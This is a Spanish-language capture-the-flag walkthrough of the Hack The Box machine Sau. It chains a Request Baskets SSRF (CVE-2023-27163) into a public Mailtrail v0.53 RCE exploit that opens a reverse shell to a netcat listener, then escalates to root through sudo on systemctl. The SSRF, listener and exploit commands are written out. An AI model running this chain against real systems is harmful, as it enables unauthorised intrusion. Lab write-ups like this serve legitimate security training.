Walkthrough — Sau (Hack The Box)
Walkthrough para la máquina Sau de HTB, enfocada en SSRF y explotación de servicios web vulnerables.
Introducción
Sau es una máquina de nivel Easy en Hack The Box. La clave está en identificar puertos poco comunes y explotar un SSRF en un servicio vulnerable.
- SO: Linux
- Dificultad: Easy
- Herramientas utilizadas:
nmap,ffuf,python,netcat
🔎 Enumeración inicial
Realicé un escaneo completo con nmap:
nmap -sC -sV -p- -T4 10.10.11.224

🌐 Acceso al servicio HTTP
Descubrí que el puerto 55555 tiene un servicio web corriendo. Se trata de Request Baskets:

Al crear una nueva “basket”, se generó un token de autenticación:

Y desde ahí se pueden ver las peticiones recibidas:

🧬 Vulnerabilidad SSRF – CVE-2023-27163
Buscando información, encontré una vulnerabilidad SSRF en este servicio:

Ejecuté el exploit para redirigir una petición hacia 127.0.0.1:
bash ./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80

Esto me reveló que detrás del servicio estaba corriendo una aplicación llamada Mailtrail:

💥 Explotación de Mailtrail v0.53
Utilicé un exploit público para obtener RCE:

Preparé un listener con netcat:
nc -lnvp 1234

Y lancé el exploit:
python3 exploit.py 10.10.14.16 1234 http://10.10.11.224:55555/rapzjz

🐚 Shell recibida

Inspeccionando el archivo de configuración de Mailtrail encontré credenciales codificadas (hash SHA256):

🏁 Flag de usuario
Navegando al home de puma, encontré user.txt:

⬆️ Escalada de privilegios
Con sudo -l, vi que podía ejecutar systemctl status trail.service como root sin contraseña:

Esto me permitió lanzar un shell interactivo como root:

🏁 Flag de root
Finalmente accedí a la flag root.txt:

✅ Resumen final
| Acción | Resultado |
|---|---|
| Enumeración | Servicio web en puerto 55555 |
| Explotación | SSRF → Mailtrail v0.53 |
| Acceso | Usuario puma |
| Escalada | Sudo abuse en systemctl |
| Flags | user.txt, root.txt ✔️ |
Autor: gueco99
🧠 Hack the Box – Sau (Easy)